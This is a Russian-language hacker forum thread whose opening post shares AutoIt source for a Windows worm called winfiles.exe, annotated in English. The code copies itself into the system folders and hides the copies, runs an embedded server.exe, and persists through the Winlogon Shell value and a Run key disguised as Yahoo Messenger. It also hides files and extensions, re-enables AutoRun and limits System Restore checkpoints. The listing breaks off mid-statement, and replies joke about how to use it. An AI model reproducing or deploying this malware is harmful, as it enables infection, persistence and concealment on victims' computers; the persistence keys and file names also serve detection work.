Хакерам (Админы тему добавьте плз)

 
  • Автор

    Вирус на autoit
    ; ----------------------------------------------------------------------------
    ;
    ; winfiles.exe Code analyzed
    ; Note: You can rebuild this script using AutoIt program from http://www.autoitscript.com/autoit3/
    ; First part of this code is to add functions used in the virus like _ProcessGetName and _ProcessGetPriority
    ;
    ; ----------------------------------------------------------------------------

    ; ----------------------------------------------------------------------------
    ; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
    ; Description: Functions that assist with process management.
    ;
    ; ------------------------------------------------------------------------------

    ;===============================================================================
    ;
    ; Description - Returns a string containing the process name that belongs to a given PID.
    ; Syntax - _ProcessGetName( $iPID )
    ; Parameters - $iPID - The PID of a currently running process
    ; Requirements - None.
    ; Return Values - Success - The name of the process
    ; Failure - Blank string and sets @error
    ; 1 - Process doesn't exist
    ; 2 - Error getting process list
    ; 3 - No processes found
    ; Notes - Supplementary to ProcessExists().
    ;===============================================================================
    Func _ProcessGetName($i_PID)
        ; Looks up the image name of the process whose PID is $i_PID.
        ; Returns the name on success. On any failure returns '' with @error = 1:
        ; every failure path in this body sets the same code, whether the process
        ; is missing, ProcessList() failed, or no row matched.
        If ProcessExists($i_PID) Then
            Local $aProcs = ProcessList()
            If Not @error Then
                ; Row 0 holds the count in [0][0]; rows 1..count are [name, PID].
                Local $iTotal = $aProcs[0][0]
                Local $iRow = 1
                While $iRow <= $iTotal
                    If $aProcs[$iRow][1] = $i_PID Then Return $aProcs[$iRow][0]
                    $iRow = $iRow + 1
                WEnd
            EndIf
        EndIf
        SetError(1)
        Return ''
    EndFunc ;==>_ProcessGetName

    ;===============================================================================
    ;
    ; Function Name: _ProcessGetPriority()
    ; Description: Get the priority of an open process
    ; Parameter(s): $vProcess - PID or name of a process.
    ; Requirement(s): AutoIt Beta v3.1.1.61+
    ; kernel32.dll (included with Windows)
    ; Return Value(s): On Success - Returns integer corresponding to
    ; the process's priority:
    ; 0 - Idle/Low
    ; 1 - Below Normal (Not supported on Windows 95/98/ME)
    ; 2 - Normal
    ; 3 - Above Normal (Not supported on Windows 95/98/ME)
    ; 4 - High
    ; 5 - Realtime
    ; On Failure: Returns -1 and sets @Error to 1
    ;
    ;===============================================================================
    ;
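    Func _ProcessGetPriority($vProcess)
        ; Returns the priority class of a running process as 0..5
        ; (0 Idle/Low, 1 Below Normal, 2 Normal, 3 Above Normal, 4 High, 5 Realtime).
        ; $vProcess - PID or name of a process.
        ; On failure returns -1 and sets @error to 1.
        ;
        ; Each DllOpen/DllCall result is checked before it is indexed: a failed DllCall
        ; does not return an array, so reading element [0] unchecked would abort the script
        ; instead of giving the documented -1 / @error = 1.
        Local $i_PID = ProcessExists($vProcess)
        If Not $i_PID Then
            SetError(1)
            Return -1
        EndIf

        Local $hDLL = DllOpen('kernel32.dll')
        If $hDLL = -1 Then
            SetError(1)
            Return -1
        EndIf

        ; 0x0400 is PROCESS_QUERY_INFORMATION: the handle is opened for querying only.
        ; NOTE(review): handles are passed as 'int' as in the original - confirm on 64-bit builds.
        Local $aOpen = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
        If @error Then
            DllClose($hDLL)
            SetError(1)
            Return -1
        EndIf

        Local $hProcess = $aOpen[0]
        If Not $hProcess Then
            ; OpenProcess returned no handle (for example access was denied).
            DllClose($hDLL)
            SetError(1)
            Return -1
        EndIf

        Local $aClass = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $hProcess)
        Local $iQueryError = @error

        ; Release the process handle and the DLL on every path from here on.
        DllCall($hDLL, 'int', 'CloseHandle', 'int', $hProcess)
        DllClose($hDLL)

        If $iQueryError Then
            SetError(1)
            Return -1
        EndIf

        ; Map the Win32 priority-class constant onto the documented 0..5 scale.
        Switch $aClass[0]
            Case 0x00000040
                Return 0
            Case 0x00004000
                Return 1
            Case 0x00000020
                Return 2
            Case 0x00008000
                Return 3
            Case 0x00000080
                Return 4
            Case 0x00000100
                Return 5
            Case Else
                SetError(1)
                Return -1
        EndSwitch

    EndFunc ;==>_ProcessGetPriority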

    ;===============================================================================
    ;
    ; Description: Executes a DOS command in a hidden command window.
    ; Syntax: _RunDOS( $sCommand )
    ; Parameter(s): $sCommand - Command to execute
    ; Requirement(s): None
    ; Return Value(s): On Success - Returns the exit code of the command
    ; On Failure - Depends on RunErrorsFatal setting
    ;
    ;===============================================================================
    Func _RunDOS($sCommand)
        ; Hands $sCommand to the command interpreter (@ComSpec /C) in a hidden window
        ; and returns whatever RunWait() returns for it.
        ; $sCommand is appended to the command line verbatim, with no quoting or
        ; filtering, so callers must not build it from untrusted input.
        Local $sShellLine = @ComSpec & " /C " & $sCommand
        Local $vExit = RunWait($sShellLine, "", @SW_HIDE)
        Return $vExit
    EndFunc ;==>_RunDOS

    ; ----------------------------------------------------------------------------
    ; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
    ; ----------------------------------------------------------------------------

  • Автор

    ; ----------------------------------------------------------------------------
    ; Virus Code Start From here
    ; ----------------------------------------------------------------------------

    ; Analyst notes on the sample's main body: it copies itself, drops a second binary,
    ; sets persistence and changes Explorer/policy values. The notes describe only what
    ; the visible statements do, as a basis for detection and clean-up.

    ; Suppresses the AutoIt tray icon, so the running script shows no tray indicator.
    #NoTrayIcon
    ; Name fragments; $x4x & $gtg are joined below into "winfiles.exe".
    $x4x = "winfiles"
    ; $myset, $mjkin, $tytt, $ltxl, $ikko and $hkhhh are assigned here but are not
    ; used anywhere in the visible part of the listing.
    $myset = "setting"
    $mjkin = ".ini"
    $tytt = ".nql"
    $ltxl = ".xls"
    $gtg = ".exe"
    $ikko = @HOUR + 2
    $hkhhh = @MIN + 30
    ; Self-copy into the system directory: clear Read-only/System/Hidden on any existing
    ; copy, overwrite it with the running executable (flag 1 = overwrite), then set
    ; Read-only + System + Hidden on it.
    ; NOTE(review): directory and file name are joined with an empty string here, so
    ; file-path indicators taken from this listing should be confirmed against a sample.
    FileSetAttrib (@SystemDir & "" & $x4x & $gtg,"-RSH")
    FileCopy (@AutoItExe, @SystemDir & "" & $x4x & $gtg,1)
    FileSetAttrib (@SystemDir & "" & $x4x & $gtg,"+RSH")
    ; Same three steps for the Windows directory.
    FileSetAttrib (@WindowsDir & "" & $x4x & $gtg,"-RSH")
    FileCopy (@AutoItExe, @WindowsDir & "" & $x4x & $gtg,1)
    FileSetAttrib (@WindowsDir & "" & $x4x & $gtg,"+RSH")
    ; FileInstall embeds c:\server.exe from the build machine at compile time and extracts
    ; it as winnt.exe in the Windows directory; the next line runs it. The embedded file's
    ; contents are not shown in this listing.
    FileInstall("c:\server.exe",@WindowsDir & "\winnt.exe")
    Run(@WindowsDir & "\winnt.exe")
    ; Persistence 1: Winlogon "Shell" is set to "Explorer.exe winfiles.exe". A Shell value
    ; with anything after explorer.exe is a strong indicator to alert on.
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $x4x & $gtg)
    ; Persistence 2: per-user Run value. The name "Yahoo Messengger" (misspelled as written)
    ; is a usable hunting string.
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "" & $x4x & $gtg)
    ; Sets CheckedValue to 0 under the Explorer "SHOWALL" folder option. Presumably this
    ; stops the "show hidden files" option from taking effect - confirm on a test system.
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL","CheckedValue","REG_DWORD",0)
    ; NoDriveTypeAutoRun is a bitmask of drive types excluded from AutoRun; 0 excludes none.
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDriveTypeAutoRun","REG_DWORD",0)
    ; Per-user Explorer view values for hidden files, extensions and protected system files:
    ; HideFileExt=1 hides known extensions and ShowSuperHidden=0 hides protected operating
    ; system files. The effect of Hidden=0 and SuperHidden=1 is not evident from the code - verify.
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","REG_DWORD",0)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","REG_DWORD",1)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","SuperHidden","REG_DWORD",1)
    ; Windows Installer policy: value 1 stops Installer from creating System Restore checkpoints.
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer","LimitSystemRestoreCheckpointing","REG_DWORD",1)
    ; The listing breaks off in the middle of the next statement; later behaviour is not visible here.
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft

    Добавлено через 00:35 мин.
    вот весь код вируса:proud: Ставим +


  • И че он делает? :fthat:


  • vt предоставь, что работает)


  • СуперМэн, и как им пользоватся?


  • Wiseeee, Вирус Тотал на Вирус?:D: ахаха :fthat: :fthat:


  • не понял :no:


  • чё за непонятица?:fthat:


  • СуперМэн, долбаеб?


  • **Artemqa** 
    **Wiseeee**, Вирус Тотал на Вирус?:D: ахаха :fthat: :fthat:
    

    ну а как :fthat:
    Надо знать как антивирусы расценивают такую ***ню


  • да я давно просёк это ктот с auth_key залил его хех пытаються взломть бред.)

    Добавлено через 00:47 мин.
    да нихера невыйдет у них)))


  • эх знать бы еще как этим пользоваться :D:


  • в блокнот все это загонишь и вирус тебе:trollface:


  • объясни поподробней что за нах?


  • ооооо спасибо давно пытался сделать!!!!:):
